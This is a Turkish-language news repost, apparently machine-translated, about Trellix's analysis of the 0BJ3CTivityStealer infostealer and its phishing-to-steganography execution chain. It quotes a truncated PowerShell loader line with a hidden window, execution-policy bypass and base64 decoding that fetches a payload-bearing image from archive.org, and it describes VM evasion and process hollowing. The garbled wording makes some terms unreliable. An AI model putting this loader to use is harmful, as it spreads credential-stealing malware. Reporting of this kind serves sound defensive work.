0BJ3CTivityStealer’ın Yürütme Zinciri Yeni yetenekleri ve pessfiltrasyon teknikleri ile tanıtıldı


0BJ3CTivityStealer'ın Yürütme Zinciri Yeni yetenekleri ve pessfiltrasyon teknikleri ile tanıtıldı

Siber güvenlik manzarası, 0BJ3CtivityStealer’ın bu tehdit ekosistemine en son ve ilgili eklemelerinden birini temsil eden sofistike bilgi çalan kötü amaçlı yazılımların ortaya çıkmasına tanık olmaya devam ediyor.

Başlangıçta bu yılın başlarında HP Wolf Güvenlik uzmanları tarafından keşfedilen bu gelişmiş stealer, çok çeşitli uygulamaları ve hassas bilgi havuzlarını hedefleyen kapsamlı bir veri açığa çıkma özellikleri göstermiştir.

Kötü amaçlı yazılımların kimlik bilgisi hasat ve sistem sızmasına yönelik sofistike yaklaşımı, onu hem bireysel kullanıcılar hem de kurumsal ortamlar için önemli bir tehdit olarak konumlandırmıştır.

Google Haberleri

0BJ3CtivityStealer tarafından kullanılan saldırı metodolojisi, özenle hazırlanmış kimlik avı kampanyalarıyla başlayan iyi düzenlenmiş çok aşamalı bir yürütme zincirini takip ediyor.

0BJ3CTivityStealer Yürütme Zinciri (Kaynak – Trellix)

Genellikle “Teklif Teklifi” gibi konuları taşıyan bu kötü niyetli e-postalar, kurbanları indirme bağlantılarını tıklamaya ikna etmek için tasarlanmış fabrikasyon satın alma siparişlerinin düşük kaliteli görüntülerini içerir.

Kötü amaçlı kimlik avı e -postası (kaynak – trellix)

Sosyal mühendislik bileşeni, şüphesiz kullanıcıları bulut depolama platformlarına, özellikle de ilk yükün dağıtımını beklediği bulut depolama platformlarına yönlendirmek için yüksek kaliteli belge sürümlerinin vaadinden yararlanır.

Trellix Advanced Araştırma Merkezi (ARC) analistleri, proaktif tehdit avcılık operasyonları sırasında bu yeni kampanyayı belirledi ve kötü amaçlı yazılımın geleneksel bilgi çalıcılarından ayıran nadir dağıtım tekniklerini ortaya çıkardı.

Araştırmacılar, daha sonraki yük aşamalarını gizlemek için steganografik tekniklerle birleştirilmiş özel PowerShell komut dosyalarının sofistike kullanımını, geleneksel algılama sistemlerini başarıyla kaçınan kötü amaçlı yazım mekanizmalarında bir evrimi temsil ettiğini kaydetti.

Kötü amaçlı JavaScript betiği (kaynak – trellix)

Küresel etki değerlendirmesi, 0BJ3CtivityStealer’ın birden fazla kıtada yaygın dağılım elde ettiğini, özellikle yüksek algılama hacimlerinin ABD, Almanya ve Karadağ’da yoğunlaştığını ortaya koymaktadır.

Bu coğrafi dağıtım modeli, hükümet kurumları ve imalat şirketleri en çok etkilenen sektörleri temsil eden hedefli bir yaklaşımdan ziyade fırsatçı bir yaklaşım önermektedir.

Kötü amaçlı yazılımların ayrımcı olmayan hedefleme metodolojisi, çeşitli endüstriler ve coğrafi bölgelerdeki kuruluşlar için risk oluşturan geniş spektrumlu bir tehdidi göstermektedir.

Steganografik yük gizleme ve çok aşamalı dağıtım

0BJ3CtivityStealer’ın teknik sofistike olması, yük gizleme ve dağıtım için steganografinin yenilikçi kullanımında en belirgin hale gelir.

Gerçek kötü niyetli işlevselliği temsil eden sadece 60 satıra sahip 3.000’den fazla kod içeren ilk JavaScript komut dosyası, gömülü PowerShell yükünü etkili bir şekilde gizleyen bir şaşkınlık mekanizması görevi görür.

Bu gizlenmiş PowerShell betiği daha sonra, görsel verileri içinde gizlenmiş bir sonraki yürütme aşamasını içeren archive.org’dan iyi huylu bir JPG görüntüsü indirir.

Steganografik ekstraksiyon işlemi, indirilen resim dosyasında belirli bir onaltılık desen (0x42 0x4d 0x32 0x55 0x36 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x28 0x00) aramayı içerir.

Bir kez bulunduktan sonra, kötü amaçlı yazılım, gizli .NET DLL yükünü yeniden yapılandırmak için RGB Pixel değerlerini okur, ilk dört bayt yük boyutunu ve daha sonraki verileri, ek sersemletme için abur cubur verileri ile birlikte gerçekleştirilebilir.

powershell -w hidden -noprofile -ep bypass -c "$bombylius="$otolite = "VkFJ'; $bonibell =
[System.Convert]::FromBase64String($otolite);$roentgenoscopes =
[System.Text.Encoding]::UTF8.GetString($bonibell);Add-Type -AssemblyName
System.Drawing;$stouts="https://archive[.]org/download/wp4096799-lost-in-space-
wallpapers_20250610/wp4096799-lost-in-space-wallpapers.jpg";

Bu çıkarılan yük yükü, aynı anda kapsamlı sanallaştırma ve kum havuzu algılama kontrolleri yaparken, planlanmış görev oluşturma yoluyla kalıcılık oluşturarak VMDetector yükleyici olarak işlev görür.

Yükleyici daha sonra, son 0BJ3CtivityStealer yükünü bulutflare tarafından yönetilen bir alt alandan alır ve kötü amaçlı yazılımları regasm.exe gibi meşru pencereler süreçlerine enjekte etmek için süreç oyma tekniklerini uygular, böylece kapsamlı veri spiltrasyon işlemlerini yürütürken gizli tutar.

Entegre etmek Herhangi biri. Gelişmiş tehditleri analiz etmek için siem veya soar ile -> 50 ücretsiz deneme aramasını deneyin



Source link